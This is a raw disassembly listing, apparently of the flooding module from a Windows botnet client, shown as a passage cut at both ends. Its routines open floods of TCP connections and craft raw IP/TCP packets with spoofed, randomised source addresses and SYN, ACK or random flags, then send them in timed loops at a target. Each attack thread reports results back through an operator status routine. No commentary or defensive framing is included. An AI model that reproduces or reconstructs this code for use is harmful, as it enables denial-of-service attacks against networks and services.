eax, [ebp+var_90] push eax push [ebp+var_214] call sub_409A73 add esp, 14h loc_4136A7: ; CODE XREF: sub_413627+5Ej lea eax, [ebp+var_414] push eax call sub_4151AD push [ebp+var_10] call sub_40B413 pop ecx pop ecx push esi call dword_4270CC ; ExitThread pop edi pop esi sub_413627 endp ; sp-analysis failed ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_4136C6 proc near ; CODE XREF: sub_413788+27p var_654 = byte ptr -654h var_14 = word ptr -14h var_12 = word ptr -12h var_10 = dword ptr -10h var_4 = dword ptr -4 arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h push ebp mov ebp, esp sub esp, 654h push 10h lea eax, [ebp+var_14] push 0 push eax call sub_41B590 add esp, 0Ch mov [ebp+var_14], 2 push [ebp+arg_4] call ds:dword_4CB654 ; htons mov [ebp+var_12], ax mov eax, [ebp+arg_0] mov [ebp+var_10], eax mov eax, [ebp+arg_8] test eax, eax mov [ebp+var_4], 1 jle short loc_413784 push ebx push esi push edi mov [ebp+arg_4], eax mov edi, 190h loc_413711: ; CODE XREF: sub_4136C6+B9j lea esi, [ebp+var_654] mov ebx, edi loc_413719: ; CODE XREF: sub_4136C6+7Aj push 0 push 1 push 2 call dword_427220 ; socket cmp eax, 0FFFFFFFFh mov [esi], eax jz short loc_41373C lea ecx, [ebp+var_4] push ecx push 8004667Eh push eax call dword_4271F8 ; ioctlsocket loc_41373C: ; CODE XREF: sub_4136C6+64j add esi, 4 dec ebx jnz short loc_413719 lea esi, [ebp+var_654] mov ebx, edi loc_41374A: ; CODE XREF: sub_4136C6+96j lea eax, [ebp+var_14] push 10h push eax push dword ptr [esi] call dword_427214 ; connect add esi, 4 dec ebx jnz short loc_41374A push 64h call dword_427078 ; Sleep lea esi, [ebp+var_654] mov ebx, edi loc_41376E: ; CODE XREF: sub_4136C6+B4j push dword ptr [esi] call dword_42721C ; closesocket add esi, 4 dec ebx jnz short loc_41376E dec [ebp+arg_4] jnz short loc_413711 pop edi pop esi pop ebx loc_413784: ; CODE XREF: sub_4136C6+3Ej xor eax, eax leave retn sub_4136C6 endp ; =============== S U B R O U T I N E ======================================= sub_413788 proc near ; CODE XREF: sub_413627+3Cp arg_0 = dword ptr 4 arg_4 = dword ptr 8 arg_8 = dword ptr 0Ch push ebx push esi push edi push [esp+0Ch+arg_0] call sub_40AAFA push [esp+10h+arg_4] mov edi, eax call sub_41B779 push [esp+14h+arg_8] mov ebx, eax call sub_41B779 mov esi, eax push esi push ebx push edi call sub_4136C6 add esp, 18h test eax, eax jnz short loc_4137BE push 1 pop eax loc_4137BE: ; CODE XREF: sub_413788+31j cdq mov ecx, 3E8h pop edi idiv ecx cdq idiv esi pop esi pop ebx retn sub_413788 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_4137CD proc near ; DATA XREF: sub_401ACD+644Ao var_414 = byte ptr -414h var_214 = dword ptr -214h var_210 = byte ptr -210h var_190 = byte ptr -190h var_110 = byte ptr -110h var_90 = byte ptr -90h var_10 = dword ptr -10h var_C = dword ptr -0Ch var_8 = dword ptr -8 arg_0 = dword ptr 8 push ebp mov ebp, esp sub esp, 414h mov eax, [ebp+arg_0] push esi push edi mov ecx, 85h mov esi, eax lea edi, [ebp+var_214] rep movsd mov dword ptr [eax+210h], 1 lea eax, [ebp+var_110] push eax lea eax, [ebp+var_190] push eax lea eax, [ebp+var_210] push eax call sub_413B1E add esp, 0Ch push eax lea eax, [ebp+var_414] push offset unk_436414 push eax call sub_41B886 xor esi, esi add esp, 0Ch cmp [ebp+var_8], esi jnz short loc_41384D push esi lea eax, [ebp+var_414] push [ebp+var_C] push eax lea eax, [ebp+var_90] push eax push [ebp+var_214] call sub_409A73 add esp, 14h loc_41384D: ; CODE XREF: sub_4137CD+5Ej lea eax, [ebp+var_414] push eax call sub_4151AD push [ebp+var_10] call sub_40B413 pop ecx pop ecx push esi call dword_4270CC ; ExitThread pop edi pop esi sub_4137CD endp ; sp-analysis failed ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_41386C proc near ; CODE XREF: sub_413B1E+3Cp var_284 = byte ptr -284h var_F4 = byte ptr -0F4h var_B4 = byte ptr -0B4h var_B3 = byte ptr -0B3h var_A0 = byte ptr -0A0h var_94 = byte ptr -94h var_8C = byte ptr -8Ch var_78 = dword ptr -78h var_74 = dword ptr -74h var_70 = byte ptr -70h var_6F = byte ptr -6Fh var_6E = word ptr -6Eh var_58 = dword ptr -58h var_50 = word ptr -50h var_4E = word ptr -4Eh var_4C = dword ptr -4Ch var_40 = dword ptr -40h var_3C = dword ptr -3Ch var_38 = dword ptr -38h var_34 = word ptr -34h var_32 = word ptr -32h var_30 = dword ptr -30h var_2C = dword ptr -2Ch var_28 = byte ptr -28h var_27 = byte ptr -27h var_26 = word ptr -26h var_24 = word ptr -24h var_22 = word ptr -22h var_20 = byte ptr -20h var_1E = word ptr -1Eh var_1C = word ptr -1Ch var_1A = word ptr -1Ah var_18 = byte ptr -18h var_17 = byte ptr -17h var_16 = word ptr -16h var_14 = dword ptr -14h var_10 = dword ptr -10h var_C = dword ptr -0Ch var_8 = dword ptr -8 var_4 = dword ptr -4 arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h arg_C = dword ptr 14h push ebp mov ebp, esp sub esp, 284h push ebx push edi push 0Eh xor ebx, ebx pop ecx xor eax, eax lea edi, [ebp+var_B3] mov [ebp+var_B4], bl rep stosd stosw stosb lea eax, [ebp+var_284] push eax push 202h call ds:dword_4CB5C4 ; WSAStartup test eax, eax jz short loc_4138AC xor eax, eax jmp loc_413B1A ; --------------------------------------------------------------------------- loc_4138AC: ; CODE XREF: sub_41386C+37j push 1 pop edi push edi push ebx push ebx push 0FFh push 3 push 2 call ds:dword_4CB6F8 ; WSASocketA cmp eax, 0FFFFFFFFh mov [ebp+var_C], eax jz loc_413B12 push esi lea ecx, [ebp+var_38] push 4 push ecx push 2 push ebx push eax mov [ebp+var_38], edi call ds:dword_4CB634 ; setsockopt cmp eax, 0FFFFFFFFh jz loc_413B08 push 10h lea eax, [ebp+var_50] push ebx push eax call sub_41B590 add esp, 0Ch mov [ebp+var_50], 2 push [ebp+arg_8] call ds:dword_4CB654 ; htons mov esi, [ebp+arg_0] push 28h mov [ebp+var_4E], ax mov [ebp+var_4C], esi mov [ebp+var_20], 45h call ds:dword_4CB654 ; htons push [ebp+arg_8] mov [ebp+var_1E], ax mov [ebp+var_1C], di mov [ebp+var_1A], bx mov [ebp+var_18], 80h mov [ebp+var_17], 6 mov [ebp+var_16], bx mov [ebp+var_10], esi call ds:dword_4CB654 ; htons push 4000h mov [ebp+var_32], ax mov [ebp+var_2C], ebx mov [ebp+var_28], 50h mov [ebp+var_27], 2 call ds:dword_4CB654 ; htons mov [ebp+var_26], ax lea eax, [ebp+var_40] push eax mov [ebp+var_22], bx mov [ebp+arg_8], ebx call dword_427134 ; QueryPerformanceFrequency lea eax, [ebp+var_8] push eax call dword_427130 ; QueryPerformanceCounter push [ebp+var_3C] mov eax, [ebp+arg_C] cdq push [ebp+var_40] push edx push eax call sub_41D280 add eax, [ebp+var_8] mov esi, edx adc esi, [ebp+var_4] mov [ebp+var_58], eax loc_413997: ; CODE XREF: sub_41386C+25Dj ; sub_41386C+26Bj mov [ebp+var_24], bx call sub_41B8E2 cdq mov ecx, 3E9h idiv ecx add edx, 3E8h push edx call ds:dword_4CB654 ; htons mov [ebp+var_34], ax call sub_41B8E2 mov edi, eax shl edi, 10h call sub_41B8E2 or edi, eax push edi call ds:dword_4CB654 ; htons movzx eax, ax mov [ebp+var_30], eax mov eax, [ebp+arg_4] inc [ebp+arg_4] push eax call ds:dword_4CB650 ; htonl push 14h mov [ebp+var_14], eax mov eax, [ebp+var_10] pop edi push edi mov [ebp+var_74], eax mov [ebp+var_70], bl mov [ebp+var_6F], 6 call ds:dword_4CB654 ; htons mov [ebp+var_6E], ax mov eax, [ebp+var_14] mov [ebp+var_78], eax lea eax, [ebp+var_78] push 20h push eax lea eax, [ebp+var_B4] push eax call sub_41C310 lea eax, [ebp+var_34] push edi push eax lea eax, [ebp+var_94] push eax call sub_41C310 lea eax, [ebp+var_B4] push 34h push eax call sub_40AC69 mov [ebp+var_24], ax lea eax, [ebp+var_20] push edi push eax lea eax, [ebp+var_B4] push eax call sub_41C310 lea eax, [ebp+var_34] push edi push eax lea eax, [ebp+var_A0] push eax call sub_41C310 push 4 lea eax, [ebp+var_8C] push ebx push eax call sub_41B590 add esp, 44h lea eax, [ebp+var_B4] push 28h push eax call sub_40AC69 mov [ebp+var_16], ax lea eax, [ebp+var_20] push edi push eax lea eax, [ebp+var_B4] push eax call sub_41C310 add esp, 14h lea eax, [ebp+var_50] push 10h push eax push ebx lea eax, [ebp+var_B4] push 28h push eax push [ebp+var_C] call ds:dword_4CB6B8 ; sendto cmp eax, 0FFFFFFFFh jz short loc_413ADC add [ebp+arg_8], eax lea eax, [ebp+var_8] push eax call dword_427130 ; QueryPerformanceCounter mov eax, [ebp+var_4] cmp eax, esi jg short loc_413B05 jl loc_413997 mov eax, [ebp+var_8] cmp eax, [ebp+var_58] jnb short loc_413B05 jmp loc_413997 ; --------------------------------------------------------------------------- loc_413ADC: ; CODE XREF: sub_41386C+247j call ds:dword_4CB5E8 ; WSAGetLastError push eax lea eax, [ebp+var_F4] push offset unk_43643C push eax call sub_41B886 lea eax, [ebp+var_F4] push eax call sub_4151AD add esp, 10h jmp short loc_413B08 ; --------------------------------------------------------------------------- loc_413B05: ; CODE XREF: sub_41386C+25Bj ; sub_41386C+269j mov ebx, [ebp+arg_8] loc_413B08: ; CODE XREF: sub_41386C+78j ; sub_41386C+297j push [ebp+var_C] call ds:dword_4CB6EC ; closesocket pop esi loc_413B12: ; CODE XREF: sub_41386C+5Bj call ds:dword_4CB5AC ; WSACleanup mov eax, ebx loc_413B1A: ; CODE XREF: sub_41386C+3Bj pop edi pop ebx leave retn sub_41386C endp ; =============== S U B R O U T I N E ======================================= sub_413B1E proc near ; CODE XREF: sub_4137CD+3Cp arg_0 = dword ptr 4 arg_4 = dword ptr 8 arg_8 = dword ptr 0Ch push ebx push esi push edi push [esp+0Ch+arg_0] call sub_40AAFA push [esp+10h+arg_4] mov esi, eax call sub_41B779 push [esp+14h+arg_8] mov ebx, eax call sub_41B779 mov edi, eax call sub_41B8E2 cdq mov ecx, 200h push edi idiv ecx push ebx lea eax, [edx+esi+100h] push eax push esi call sub_41386C add esp, 1Ch test eax, eax jnz short loc_413B69 push 1 pop eax loc_413B69: ; CODE XREF: sub_413B1E+46j cdq mov ecx, 3E8h idiv ecx cdq idiv edi pop edi pop esi pop ebx retn sub_413B1E endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_413B78 proc near ; DATA XREF: sub_401ACD+6E45o var_394 = byte ptr -394h var_194 = dword ptr -194h var_190 = byte ptr -190h var_110 = byte ptr -110h var_90 = byte ptr -90h var_10 = dword ptr -10h var_C = dword ptr -0Ch var_8 = dword ptr -8 arg_0 = dword ptr 8 push ebp mov ebp, esp sub esp, 394h mov eax, [ebp+arg_0] push esi push edi push 65h pop ecx mov esi, eax lea edi, [ebp+var_194] rep movsd mov dword ptr [eax+190h], 1 lea eax, [ebp+var_110] push eax call sub_41B779 pop ecx push eax lea eax, [ebp+var_190] push eax call ds:dword_4CB694 ; inet_addr push eax call sub_413C1B pop ecx pop ecx push eax lea eax, [ebp+var_394] push offset dword_43645C push eax call sub_41B886 xor esi, esi add esp, 0Ch cmp [ebp+var_8], esi jnz short loc_413BFC push esi lea eax, [ebp+var_394] push [ebp+var_C] push eax lea eax, [ebp+var_90] push eax push [ebp+var_194] call sub_409A73 add esp, 14h loc_413BFC: ; CODE XREF: sub_413B78+62j lea eax, [ebp+var_394] push eax call sub_4151AD push [ebp+var_10] call sub_40B413 pop ecx pop ecx push esi call dword_4270CC ; ExitThread pop edi pop esi sub_413B78 endp ; sp-analysis failed ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_413C1B proc near ; CODE XREF: sub_413B78+41p var_98 = word ptr -98h var_96 = word ptr -96h var_94 = dword ptr -94h var_88 = dword ptr -88h var_84 = dword ptr -84h var_80 = dword ptr -80h var_7C = dword ptr -7Ch var_78 = dword ptr -78h var_74 = dword ptr -74h var_70 = dword ptr -70h var_6C = dword ptr -6Ch var_68 = dword ptr -68h var_64 = dword ptr -64h var_60 = dword ptr -60h var_5C = dword ptr -5Ch var_58 = dword ptr -58h var_54 = dword ptr -54h var_50 = dword ptr -50h var_4C = dword ptr -4Ch var_48 = dword ptr -48h var_44 = dword ptr -44h var_40 = dword ptr -40h var_3C = dword ptr -3Ch var_38 = dword ptr -38h var_34 = dword ptr -34h var_30 = dword ptr -30h var_2C = dword ptr -2Ch var_28 = dword ptr -28h var_24 = byte ptr -24h var_23 = byte ptr -23h var_22 = word ptr -22h var_20 = word ptr -20h var_1E = word ptr -1Eh var_1C = byte ptr -1Ch var_1B = byte ptr -1Bh var_1A = word ptr -1Ah var_18 = dword ptr -18h var_14 = dword ptr -14h var_10 = dword ptr -10h var_C = dword ptr -0Ch var_8 = dword ptr -8 var_4 = dword ptr -4 arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch push ebp mov ebp, esp sub esp, 98h push ebx push esi push edi push 1 pop ecx and [ebp+var_88], 0 push 4 and [ebp+var_58], 0 pop esi mov ebx, 0FFh push 6 xor eax, eax pop edx lea edi, [ebp+var_54] mov [ebp+var_84], ecx mov [ebp+var_80], 2 mov [ebp+var_7C], esi mov [ebp+var_78], edx mov [ebp+var_74], 8 mov [ebp+var_70], 0Ch mov [ebp+var_6C], 11h mov [ebp+var_68], 16h mov [ebp+var_64], 29h mov [ebp+var_60], 3Ah mov [ebp+var_5C], ebx mov [ebp+var_50], eax stosd lea edi, [ebp+var_2C] mov [ebp+var_4C], eax mov [ebp+var_48], eax mov [ebp+var_44], 2000h mov [ebp+var_40], esi mov [ebp+var_3C], edx mov [ebp+var_38], 3FFFh mov [ebp+var_34], ecx mov [ebp+var_30], eax mov [ebp+var_28], ecx stosd mov edi, 100h push edi call sub_41CFC5 pop ecx mov [ebp+var_4], eax push edi push eax call ds:dword_4CB668 ; gethostname push [ebp+var_4] call ds:dword_4CB6D8 ; gethostbyname mov eax, [eax+0Ch] push ebx push 3 push 2 mov eax, [eax] mov eax, [eax] mov [ebp+var_C], eax call ds:dword_4CB6D4 ; socket lea ecx, [ebp+var_28] push esi push ecx push 2 push 0 push eax mov [ebp+var_4], eax call ds:dword_4CB634 ; setsockopt mov esi, 200h push esi call sub_41B4D5 mov edi, dword_4270A8 pop ecx mov [ebp+var_8], eax call edi ; GetTickCount mov [ebp+var_10], eax mov eax, [ebp+arg_0] push 29Ah mov [ebp+var_94], eax mov [ebp+var_98], 2 call ds:dword_4CB654 ; htons mov [ebp+var_96], ax loc_413D36: ; CODE XREF: sub_413C1B+1FCj call edi ; GetTickCount sub eax, [ebp+var_10] xor edx, edx mov ecx, 3E8h div ecx cmp eax, [ebp+arg_4] ja loc_413E1C call sub_41B8E2 cdq mov ecx, ebx idiv ecx mov eax, [ebp+var_C] and eax, 0FFFFFFh shl edx, 18h or edx, eax mov [ebp+var_C], edx call sub_41B8E2 cdq mov ecx, ebx idiv ecx mov [ebp+var_54], edx call sub_41B8E2 cdq mov ecx, 1FA4h mov [ebp+var_24], 45h idiv ecx mov [ebp+var_23], 4 mov [ebp+var_2C], edx call sub_41B8E2 mov [ebp+var_20], ax call sub_41B8E2 push 0Ah cdq pop ecx idiv ecx mov ax, word ptr [ebp+edx*4+var_50] push eax call ds:dword_4CB654 ; htons push esi mov [ebp+var_1E], ax call ds:dword_4CB654 ; htons mov [ebp+var_22], ax mov [ebp+var_1C], bl call sub_41B8E2 push 0Eh cdq pop ecx idiv ecx push 14h mov al, byte ptr [ebp+edx*4+var_88] mov [ebp+var_1B], al mov eax, [ebp+var_C] mov [ebp+var_18], eax mov eax, [ebp+arg_0] mov [ebp+var_14], eax lea eax, [ebp+var_24] push eax call sub_40AC69 mov [ebp+var_1A], ax lea eax, [ebp+var_24] push 14h push eax push [ebp+var_8] call sub_41C310 add esp, 14h lea eax, [ebp+var_98] push 10h push eax push 0 push esi push [ebp+var_8] push [ebp+var_4] call ds:dword_4CB6B8 ; sendto jmp loc_413D36 ; --------------------------------------------------------------------------- loc_413E1C: ; CODE XREF: sub_413C1B+12Cj push [ebp+var_8] call sub_41B0B1 pop ecx push [ebp+var_4] call ds:dword_4CB6EC ; closesocket push 1 pop eax pop edi pop esi pop ebx leave retn sub_413C1B endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_413E36 proc near ; DATA XREF: sub_401ACD+53E9o var_440 = byte ptr -440h var_240 = dword ptr -240h var_23C = byte ptr -23Ch var_1BC = byte ptr -1BCh var_13C = byte ptr -13Ch var_BC = dword ptr -0BCh var_B8 = dword ptr -0B8h var_B4 = dword ptr -0B4h var_B0 = dword ptr -0B0h var_AC = dword ptr -0ACh var_A8 = dword ptr -0A8h var_A0 = byte ptr -0A0h var_9F = byte ptr -9Fh var_8C = byte ptr -8Ch var_80 = byte ptr -80h var_78 = byte ptr -78h var_64 = dword ptr -64h var_60 = dword ptr -60h var_5C = byte ptr -5Ch var_5B = byte ptr -5Bh var_5A = word ptr -5Ah var_44 = word ptr -44h var_42 = word ptr -42h var_40 = dword ptr -40h var_34 = dword ptr -34h var_30 = dword ptr -30h var_2C = byte ptr -2Ch var_2A = word ptr -2Ah var_28 = word ptr -28h var_26 = word ptr -26h var_24 = byte ptr -24h var_23 = byte ptr -23h var_22 = word ptr -22h var_20 = dword ptr -20h var_1C = dword ptr -1Ch var_18 = word ptr -18h var_16 = word ptr -16h var_14 = dword ptr -14h var_10 = dword ptr -10h var_C = byte ptr -0Ch var_B = byte ptr -0Bh var_A = word ptr -0Ah var_8 = word ptr -8 var_6 = word ptr -6 var_4 = dword ptr -4 arg_0 = dword ptr 8 push ebp mov ebp, esp sub esp, 440h mov eax, [ebp+arg_0] push ebx push esi push edi push 68h mov esi, eax pop ecx lea edi, [ebp+var_240] rep movsd push 1 xor ebx, ebx pop esi lea edi, [ebp+var_9F] push 0Eh mov [eax+19Ch], esi pop ecx xor eax, eax mov [ebp+var_A0], bl rep stosd stosw stosb mov edi, dword_4270A8 call edi ; GetTickCount push eax call sub_41B8D8 pop ecx push 0FFh push 3 push 2 call ds:dword_4CB6D4 ; socket cmp eax, 0FFFFFFFFh mov [ebp+var_4], eax jnz short loc_413EFF call ds:dword_4CB5E8 ; WSAGetLastError push eax lea eax, [ebp+var_440] push offset unk_436574 push eax call sub_41B886 add esp, 0Ch cmp [ebp+var_A8], ebx jnz short loc_413EDF push ebx lea eax, [ebp+var_440] push [ebp+var_AC] push eax lea eax, [ebp+var_13C] push eax push [ebp+var_240] call sub_409A73 add esp, 14h loc_413EDF: ; CODE XREF: sub_413E36+84j lea eax, [ebp+var_440] push eax call sub_4151AD push [ebp+var_BC] call sub_40B413 pop ecx pop ecx push ebx call dword_4270CC ; ExitThread loc_413EFF: ; CODE XREF: sub_413E36+61j lea ecx, [ebp+var_34] push 4 push ecx push 2 push ebx push eax mov [ebp+var_34], esi call ds:dword_4CB634 ; setsockopt cmp eax, 0FFFFFFFFh jnz short loc_413F7D call ds:dword_4CB5E8 ; WSAGetLastError push eax lea eax, [ebp+var_440] push offset unk_43653C push eax call sub_41B886 add esp, 0Ch cmp [ebp+var_A8], ebx jnz short loc_413F5D push ebx lea eax, [ebp+var_440] push [ebp+var_AC] push eax lea eax, [ebp+var_13C] push eax push [ebp+var_240] call sub_409A73 add esp, 14h loc_413F5D: ; CODE XREF: sub_413E36+102j lea eax, [ebp+var_440] push eax call sub_4151AD push [ebp+var_BC] call sub_40B413 pop ecx pop ecx push ebx call dword_4270CC ; ExitThread loc_413F7D: ; CODE XREF: sub_413E36+DFj lea eax, [ebp+var_23C] push eax call ds:dword_4CB694 ; inet_addr cmp eax, 0FFFFFFFFh jnz short loc_413FED lea eax, [ebp+var_440] push offset unk_43651C push eax call sub_41B886 cmp [ebp+var_A8], ebx pop ecx pop ecx jnz short loc_413FCD push ebx lea eax, [ebp+var_440] push [ebp+var_AC] push eax lea eax, [ebp+var_13C] push eax push [ebp+var_240] call sub_409A73 add esp, 14h loc_413FCD: ; CODE XREF: sub_413E36+172j lea eax, [ebp+var_440] push eax call sub_4151AD push [ebp+var_BC] call sub_40B413 pop ecx pop ecx push ebx call dword_4270CC ; ExitThread loc_413FED: ; CODE XREF: sub_413E36+157j push 10h lea eax, [ebp+var_44] push ebx push eax call sub_41B590 add esp, 0Ch mov [ebp+var_44], 2 push ebx call ds:dword_4CB654 ; htons mov [ebp+var_42], ax lea eax, [ebp+var_23C] push eax call ds:dword_4CB694 ; inet_addr mov [ebp+var_40], eax mov [ebp+arg_0], ebx call edi ; GetTickCount mov [ebp+var_30], eax loc_414025: ; CODE XREF: sub_413E36+430j call edi ; GetTickCount sub eax, [ebp+var_30] xor edx, edx mov ecx, 3E8h div ecx cmp eax, [ebp+var_B4] ja loc_4142E9 push 28h mov [ebp+var_2C], 45h call ds:dword_4CB654 ; htons cmp [ebp+var_B0], ebx mov [ebp+var_2A], ax mov [ebp+var_28], si mov [ebp+var_26], bx mov [ebp+var_24], 80h mov [ebp+var_23], 6 mov [ebp+var_22], bx jz short loc_414098 call sub_41B8E2 mov esi, eax shl esi, 8 call sub_41B8E2 add esi, eax shl esi, 8 call sub_41B8E2 add esi, eax shl esi, 8 call sub_41B8E2 add esi, eax push 1 mov [ebp+var_20], esi pop esi jmp short loc_4140AE ; --------------------------------------------------------------------------- loc_414098: ; CODE XREF: sub_413E36+233j push [ebp+var_240] call sub_40AC10 pop ecx push eax call ds:dword_4CB694 ; inet_addr mov [ebp+var_20], eax loc_4140AE: ; CODE XREF: sub_413E36+260j mov eax, [ebp+var_40] cmp [ebp+var_B8], ebx mov [ebp+var_1C], eax jnz short loc_4140CC call sub_41B8E2 cdq mov ecx, 401h idiv ecx push edx jmp short loc_4140D2 ; --------------------------------------------------------------------------- loc_4140CC: ; CODE XREF: sub_413E36+284j push [ebp+var_B8] loc_4140D2: ; CODE XREF: sub_413E36+294j call ds:dword_4CB654 ; htons mov [ebp+var_16], ax call sub_41B8E2 cdq mov ecx, 401h idiv ecx push edx call ds:dword_4CB654 ; htons push 12345678h mov [ebp+var_18], ax call ds:dword_4CB650 ; htonl mov [ebp+var_14], eax lea eax, [ebp+var_1BC] push offset aSyn ; "syn" push eax call sub_41B900 pop ecx test eax, eax pop ecx jz short loc_414122 mov [ebp+var_10], ebx mov [ebp+var_B], 2 jmp short loc_41417E ; --------------------------------------------------------------------------- loc_414122: ; CODE XREF: sub_413E36+2E1j lea eax, [ebp+var_1BC] push offset aAck ; "ack" push eax call sub_41B900 pop ecx test eax, eax pop ecx jz short loc_414142 mov [ebp+var_10], ebx mov [ebp+var_B], 10h jmp short loc_41417E ; --------------------------------------------------------------------------- loc_414142: ; CODE XREF: sub_413E36+301j lea eax, [ebp+var_1BC] push offset aRandom_0 ; "random" push eax call sub_41B900 pop ecx test eax, eax pop ecx jz short loc_41417E call sub_41B8E2 push 3 cdq pop ecx idiv ecx mov [ebp+var_10], edx call sub_41B8E2 push 2 cdq pop ecx idiv ecx neg edx sbb dl, dl and dl, 0Eh add dl, cl mov [ebp+var_B], dl loc_41417E: ; CODE XREF: sub_413E36+2EAj ; sub_413E36+30Aj ... push 200h mov [ebp+var_C], 50h call ds:dword_4CB654 ; htons mov [ebp+var_A], ax mov eax, [ebp+var_20] mov [ebp+var_64], eax mov eax, [ebp+var_1C] push 14h mov [ebp+var_6], bx mov [ebp+var_8], bx mov [ebp+var_60], eax mov [ebp+var_5C], bl mov [ebp+var_5B], 6 call ds:dword_4CB654 ; htons mov [ebp+var_5A], ax lea eax, [ebp+var_64] push 20h push eax lea eax, [ebp+var_A0] push eax call sub_41C310 lea eax, [ebp+var_18] push 14h push eax lea eax, [ebp+var_80] push eax call sub_41C310 lea eax, [ebp+var_A0] push 34h push eax call sub_40AC69 mov [ebp+var_8], ax lea eax, [ebp+var_2C] push 14h push eax lea eax, [ebp+var_A0] push eax call sub_41C310 lea eax, [ebp+var_18] push 14h push eax lea eax, [ebp+var_8C] push eax call sub_41C310 push 4 lea eax, [ebp+var_78] push ebx push eax call sub_41B590 add esp, 44h lea eax, [ebp+var_A0] push 28h push eax call sub_40AC69 mov [ebp+var_22], ax lea eax, [ebp+var_2C] push 14h push eax lea eax, [ebp+var_A0] push eax call sub_41C310 add esp, 14h lea eax, [ebp+var_44] push 10h push eax push ebx lea eax, [ebp+var_A0] push 3Ch push eax push [ebp+var_4] call ds:dword_4CB6B8 ; sendto cmp eax, 0FFFFFFFFh jz short loc_41426B inc [ebp+arg_0] jmp loc_414025 ; --------------------------------------------------------------------------- loc_41426B: ; CODE XREF: sub_413E36+42Bj push [ebp+var_4] call ds:dword_4CB6EC ; closesocket call ds:dword_4CB5E8 ; WSAGetLastError push eax lea eax, [ebp+var_23C] push [ebp+arg_0] push eax push offset unk_4364CC lea eax, [ebp+var_440] push 200h push eax call sub_41B980 add esp, 18h cmp [ebp+var_A8], ebx jnz short loc_4142C9 push ebx lea eax, [ebp+var_440] push [ebp+var_AC] push eax lea eax, [ebp+var_13C] push eax push [ebp+var_240] call sub_409A73 add esp, 14h loc_4142C9: ; CODE XREF: sub_413E36+46Ej lea eax, [ebp+var_440] push eax call sub_4151AD push [ebp+var_BC] call sub_40B413 pop ecx pop ecx push ebx call dword_4270CC ; ExitThread loc_4142E9: ; CODE XREF: sub_413E36+203j push [ebp+var_4] call ds:dword_4CB6EC ; closesocket mov eax, [ebp+arg_0] xor edx, edx imul eax, 3Ch mov ecx, eax shr eax, 0Ah div [ebp+var_B4] shr ecx, 14h push ecx push eax lea eax, [ebp+var_23C] push [ebp+arg_0] push eax lea eax, [ebp+var_1BC] push eax lea eax, [ebp+var_440] push offset unk_43647C push eax call sub_41B886 add esp, 1Ch cmp [ebp+var_A8], ebx jnz short loc_41435A push ebx lea eax, [ebp+var_440] push [ebp+var_AC] push eax lea eax, [ebp+var_13C] push eax push [ebp+var_240] call sub_409A73 add esp, 14h loc_41435A: ; CODE XREF: sub_413E36+4FFj lea eax, [ebp+var_440] push eax call sub_4151AD push [ebp+var_BC] call sub_40B413 pop ecx pop ecx push ebx call dword_4270CC ; ExitThread sub_413E36 endp ; sp-analysis failed ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_41437A proc near ; CODE XREF: sub_414484+19Ap ; sub_414484+1A9p ... arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch push ebp mov ebp, esp mov eax, [ebp+arg_4] mov edx, [ebp+arg_0] push esi xor esi, esi cmp eax, 1 mov [ebp+arg_4], esi jle short loc_4143A6 mov ecx, eax push edi shr ecx, 1 lea edi, [ecx+ecx] sub eax, edi loc_414398: ; CODE XREF: sub_41437A+26j movzx edi, word ptr [edx] add esi, edi inc edx inc edx dec ecx jnz short loc_414398 pop edi cmp eax, 1 loc_4143A6: ; CODE XREF: sub_41437A+12j jnz short loc_4143B3 mov al, [edx] mov byte ptr [ebp+arg_4], al movzx eax, word ptr [ebp+arg_4] add esi, eax loc_4143B3: ; CODE XREF: sub_41437A:loc_4143A6j mov ecx, esi and esi, 0FFFFh sar ecx, 10h add ecx, esi pop esi mov eax, ecx sar eax, 10h add eax, ecx not eax pop ebp retn sub_41437A endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_4143CC proc near ; DATA XREF: sub_401ACD+6D4Ao var_394 = byte ptr -394h var_194 = dword ptr -194h var_190 = byte ptr -190h var_110 = byte ptr -110h var_90 = byte ptr -90h var_10 = dword ptr -10h var_C = dword ptr -0Ch var_8 = dword ptr -8 arg_0 = dword ptr 8 push ebp mov ebp, esp sub esp, 394h mov eax, [ebp+arg_0] push esi push edi push 65h pop ecx mov esi, eax lea edi, [ebp+var_194] rep movsd mov dword ptr [eax+190h], 1 lea eax, [ebp+var_110] push eax call sub_41B779 pop ecx push eax lea eax, [ebp+var_190] push eax call ds:dword_4CB694 ; inet_addr push eax lea esi, [ebp+var_194] sub esp, 194h push 65h pop ecx mov edi, esp rep movsd call sub_414484 add esp, 19Ch push eax lea eax, [ebp+var_394] push offset unk_4365A8 push eax call sub_41B886 xor esi, esi add esp, 0Ch cmp [ebp+var_8], esi jnz short loc_414467 push esi lea eax, [ebp+var_394] push [ebp+var_C] push eax lea eax, [ebp+var_90] push eax push [ebp+var_194] call sub_409A73 add esp, 14h loc_414467: ; CODE XREF: sub_4143CC+79j lea eax, [ebp+var_394] push eax call sub_4151AD push [ebp+var_10] call sub_40B413 pop ecx pop ecx push esi call dword_4270CC ; ExitThread sub_4143CC endp ; sp-analysis failed ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_414484 proc near ; CODE XREF: sub_4143CC+54p var_CC = byte ptr -0CCh var_AC = dword ptr -0ACh var_A8 = dword ptr -0A8h var_A4 = byte ptr -0A4h var_A3 = byte ptr -0A3h var_A2 = word ptr -0A2h var_A0 = byte ptr -0A0h var_8C = byte ptr -8Ch var_78 = word ptr -78h var_76 = word ptr -76h var_74 = dword ptr -74h var_68 = byte ptr -68h var_64 = byte ptr -64h var_63 = byte ptr -63h var_62 = byte ptr -62h var_58 = dword ptr -58h var_54 = byte ptr -54h var_52 = word ptr -52h var_50 = word ptr -50h var_4E = word ptr -4Eh var_4C = byte ptr -4Ch var_4B = byte ptr -4Bh var_4A = word ptr -4Ah var_48 = dword ptr -48h var_44 = dword ptr -44h var_40 = word ptr -40h 